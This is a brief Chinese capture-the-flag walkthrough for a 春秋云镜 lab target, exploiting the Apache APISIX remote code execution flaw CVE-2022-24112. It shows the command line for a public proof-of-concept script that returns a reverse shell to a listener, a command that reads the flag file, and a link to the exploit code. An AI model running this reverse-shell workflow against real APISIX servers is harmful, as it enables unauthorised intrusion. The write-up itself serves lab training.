[春秋云镜]CVE-2022-24112

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!

靶场介绍

Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。

春秋云镜开启靶场:

http://eci-2ze4llupfqpdq7xjdiet.cloudeci1.ichunqiu.com:9080/

[春秋云镜]CVE-2022-24112_第1张图片

exp可以直接打

vps先开一个监听

[春秋云镜]CVE-2022-24112_第2张图片

 命令格式

python3 poc2.py -t eci-2zebn203x9kbbx7banv2.cloudeci1.ichunqiu.com -p 9080 -L 127.0.0.1 -P 9999

执行poc  vps成功收到shell

命令cat ../../../../../../flag  读取flag

[春秋云镜]CVE-2022-24112_第3张图片

POC地址
https://codeload.github.com/twseptian/cve-2022-24112/zip/refs/heads/main

你可能感兴趣的:(春秋云镜,靶场,安全,web安全)